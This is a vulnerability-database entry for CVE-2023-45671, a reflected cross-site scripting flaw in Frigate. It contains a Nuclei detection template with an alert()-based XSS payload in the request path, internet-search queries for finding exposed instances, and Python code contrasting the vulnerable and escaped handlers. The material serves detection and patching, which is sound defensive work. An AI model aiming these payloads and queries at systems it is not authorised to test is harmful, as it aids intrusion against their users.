Frigate < 0.13.0 Beta 3 - Cross-Site Scripting

01 Jul 2026 03:36:47 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Frigate < 0.13.0 Beta 3 - Cross-Site Scripting vulnerability in API endpoint

Related

Reporter | Title | Published
Circl | CVE-2023-45671 | 31 Oct 2023 01:20
CNNVD | Frigate Cross-Site Scripting Vulnerability | 30 Oct 2023 00:00
CVE | CVE-2023-45671 | 30 Oct 2023 22:41
Cvelist | CVE-2023-45671 Frigate reflected XSS through `/<camera_name>` API endpoints | 30 Oct 2023 22:41
NVD | CVE-2023-45671 | 30 Oct 2023 23:15
OSV | CVE-2023-45671 Frigate reflected XSS through `/<camera_name>` API endpoints | 30 Oct 2023 22:41
Prion | Cross site scripting | 30 Oct 2023 23:15
Positive Technologies | PT-2023-29640 · Frigate · Frigate | 30 Oct 2023 00:00
RedhatCVE | CVE-2023-45671 | 9 Jan 2026 09:27

id: CVE-2023-45671

info:
  name: Frigate < 0.13.0 Beta 3 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/<camera_name>` base path, as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could be exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution of arbitrary JavaScript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.
  impact: |
    Authenticated attackers can inject malicious JavaScript through unsanitized camera_name path values in API endpoints to execute attacks against Frigate users when they click specially crafted links.
  remediation: It has been fixed in version 0.13.0 Beta 3
  reference:
    - https://github.com/blakeblackshear/frigate/security/advisories/GHSA-jjxc-m35j-p56f
    - https://nvd.nist.gov/vuln/detail/CVE-2023-45671
    - https://securitylab.github.com/advisories/GHSL-2023-190_Frigate/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.7
    cve-id: CVE-2023-45671
    cwe-id: CWE-79
    epss-score: 0.01425
    epss-percentile: 0.69603
    cpe: cpe:2.3:a:frigate:frigate:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: frigate
    product: frigate
    shodan-query:
      - title:"Frigate"
      - http.title:"frigate"
    fofa-query: title="frigate"
    google-query: intitle:"frigate"
  tags: cve,cve2023,frigate,xss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Camera named <img src=\"\" onerror=alert(document.domain)>")'
          - 'contains(header, "text/html")'
          - 'status_code == 404'
        condition: and
# digest: 4a0a00473045022100a453673d2466ff7a0bfadbd9719e75f21dbe1fa92df721ecc85fb737db03ae210220513feb5a90f645f93e40d93a80200fb286b39168b9229f78a46492049b0dd869:922c64590222798bb761d5b6d8e72950
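The reflection the description above names, as an added illustrative example that is not Frigate's own code: a stand-in for the pre-fix 404 handler beside a hardened form that escapes the value and drops the HTML content type, plus a check that mirrors the template's three DSL matchers. The CAMERAS set and the exact "Camera named ..." error wording are assumptions.

```python
import html
import json
from typing import Dict, Tuple

# (status, headers, body) tuple standing in for an HTTP response.
Response = Tuple[int, Dict[str, str], str]

# Constructed camera inventory standing in for a Frigate config (assumption).
CAMERAS = {"front_door", "driveway"}

# The template's path value after URL decoding; this is the string the
# matcher expects to find reflected in the 404 body.
PROBE = '<img src="" onerror=alert(document.domain)>'


def lookup_camera_vulnerable(camera_name: str) -> Response:
    """Pre-0.13.0 Beta 3 behaviour as the advisory describes it (illustrative,
    not Frigate's actual handler): the `/<camera_name>` path value is echoed
    verbatim into an HTML 404 body, so markup in it reaches the browser unescaped."""
    if camera_name in CAMERAS:
        return 200, {"Content-Type": "application/json"}, json.dumps({"camera": camera_name})
    return 404, {"Content-Type": "text/html"}, f"Camera named {camera_name} is not defined"


def lookup_camera_hardened(camera_name: str) -> Response:
    """Hardened form: HTML-escape the reflected value and serve the error as
    plain text, so neither the characters nor the content type let the
    browser interpret the value as markup."""
    if camera_name in CAMERAS:
        return 200, {"Content-Type": "application/json"}, json.dumps({"camera": camera_name})
    safe = html.escape(camera_name, quote=True)
    return 404, {"Content-Type": "text/plain"}, f"Camera named {safe} is not defined"


def nuclei_matcher_fires(resp: Response, probe: str = PROBE) -> bool:
    """Mirror of the template's three DSL matchers joined with `condition: and`:
    probe reflected in the body, HTML content type, and a 404 status."""
    status, headers, body = resp
    header_blob = "\r\n".join(f"{k}: {v}" for k, v in headers.items())
    return (f"Camera named {probe}" in body
            and "text/html" in header_blob
            and status == 404)


if __name__ == "__main__":
    print("vulnerable handler matches:", nuclei_matcher_fires(lookup_camera_vulnerable(PROBE)))
    print("hardened handler matches:  ", nuclei_matcher_fires(lookup_camera_hardened(PROBE)))
```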


04 Feb 2026 07:00 (current)
Vulners AI Score: 5.9 (Medium risk)
CVSS 3.1: 4.7
EPSS: 0.01425